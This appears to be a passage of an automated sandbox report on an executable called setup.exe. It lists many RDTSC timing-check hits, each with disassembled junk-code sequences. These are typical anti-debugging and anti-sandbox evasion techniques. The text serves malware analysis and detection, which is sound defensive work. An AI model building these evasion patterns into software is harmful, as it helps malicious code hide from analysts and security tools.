Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 965EA9 second address: 965EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 965EAD second address: 965EB9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007FBA2516CD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 95BEED second address: 95BEF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 95BEF5 second address: 95BEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 95BEFB second address: 95BEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 95BEFF second address: 95BF26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Fh 0x00000007 jbe 00007FBA2516CD46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FBA2516CD46h 0x00000017 jnp 00007FBA2516CD46h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 93096E second address: 930985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBA24820D9Dh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 930985 second address: 930989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 930989 second address: 930997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 930997 second address: 93099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 93099B second address: 93099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 93099F second address: 9309A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9309A5 second address: 9309AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9309AB second address: 9309AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9309AF second address: 9309B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9309B5 second address: 9309C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007FBA2516CD46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9668BE second address: 9668C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9668C3 second address: 9668D6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA2516CD4Eh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9668D6 second address: 9668DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 96A0C6 second address: 96A0D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FBA2516CD48h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9375B2 second address: 9375B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 96C36F second address: 96C375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 972430 second address: 972436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 971965 second address: 97196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97200B second address: 972024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 jmp 00007FBA24820D9Fh 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 973771 second address: 973775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97383F second address: 973855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 973855 second address: 97388B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBA2516CD48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FBA2516CD57h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBA2516CD4Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97388B second address: 9738AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820DA2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9738AA second address: 9738B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9738B1 second address: 973904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FBA24820D98h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 add dword ptr [ebp+122D1F2Ch], ecx 0x00000028 sub si, F48Bh 0x0000002d call 00007FBA24820D99h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FBA24820DA1h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 973A48 second address: 973A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 973EA4 second address: 973EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97436E second address: 974372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 974372 second address: 974376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9743F7 second address: 97440E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBA2516CD48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FBA2516CD46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97440E second address: 974425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 974506 second address: 97451B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA2516CD50h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97467D second address: 974687 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 974687 second address: 9746A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD55h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 974981 second address: 974987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 974987 second address: 97498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97498B second address: 97499D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FBA24820DA0h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97499D second address: 9749CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FBA2516CD48h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2B70h] 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9749CD second address: 9749DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820D9Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 974EB6 second address: 974EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 974EBA second address: 974EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 974EC6 second address: 974F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007FBA2516CD58h 0x0000000b popad 0x0000000c nop 0x0000000d pushad 0x0000000e movzx esi, si 0x00000011 or eax, dword ptr [ebp+122D561Fh] 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c sbb esi, 08A5F7D0h 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 push esi 0x00000026 pop esi 0x00000027 pop edi 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 976938 second address: 976957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9760C6 second address: 9760CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9760CC second address: 9760D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9760D1 second address: 9760F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9773C1 second address: 9773CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97944F second address: 979455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 979455 second address: 9794BA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movsx esi, ax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FBA24820D98h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FBA24820D98h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov si, di 0x0000004b ja 00007FBA24820D96h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9794BA second address: 9794C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97A041 second address: 97A046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97E710 second address: 97E722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnp 00007FBA2516CD46h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97914B second address: 97914F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97914F second address: 97915E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 979DF5 second address: 979DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 979DF9 second address: 979E07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 979E07 second address: 979E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 98180A second address: 98180F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9827E0 second address: 9827F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA24820DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9827F8 second address: 982828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2388h], edi 0x00000011 push 00000000h 0x00000013 add bx, 57CBh 0x00000018 xor ebx, dword ptr [ebp+122D2964h] 0x0000001e push 00000000h 0x00000020 jnp 00007FBA2516CD49h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 982828 second address: 98282C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 98282C second address: 982830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 982830 second address: 982836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97E90F second address: 97E934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA2516CD51h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 982836 second address: 982845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820D9Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97E934 second address: 97E93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 982845 second address: 982853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 982853 second address: 982857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 982857 second address: 982861 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97E93B second address: 97E9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 3ACC8044h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FBA2516CD48h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D3785h], eax 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b pushad 0x0000003c mov esi, dword ptr [ebp+122D1E23h] 0x00000042 cmc 0x00000043 popad 0x00000044 mov eax, dword ptr [ebp+122D0FD9h] 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007FBA2516CD48h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 jnl 00007FBA2516CD4Eh 0x0000006a push FFFFFFFFh 0x0000006c mov edi, dword ptr [ebp+1246E7C2h] 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007FBA2516CD4Fh 0x0000007a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97E9D0 second address: 97E9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 980988 second address: 980992 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBA2516CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 980992 second address: 980A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e je 00007FBA24820D9Ch 0x00000014 jnl 00007FBA24820D96h 0x0000001a sbb ebx, 1B4BFD3Ah 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007FBA24820D98h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0421h] 0x00000047 jne 00007FBA24820D9Ch 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007FBA24820D98h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 xor ebx, 3F829395h 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FBA24820D9Fh 0x00000077 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 986DB0 second address: 986DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD55h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 986DC9 second address: 986DDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 986DDB second address: 986DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 986DE2 second address: 986E5D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA24820D98h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+12449762h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FBA24820D98h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push edx 0x00000030 or edi, 25FA20FFh 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 jmp 00007FBA24820D9Ch 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007FBA24820DA1h 0x00000047 jmp 00007FBA24820DA7h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 986E5D second address: 986E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 986E64 second address: 986E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 986E71 second address: 986E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 986E76 second address: 986E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 987E32 second address: 987E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FBA2516CD4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
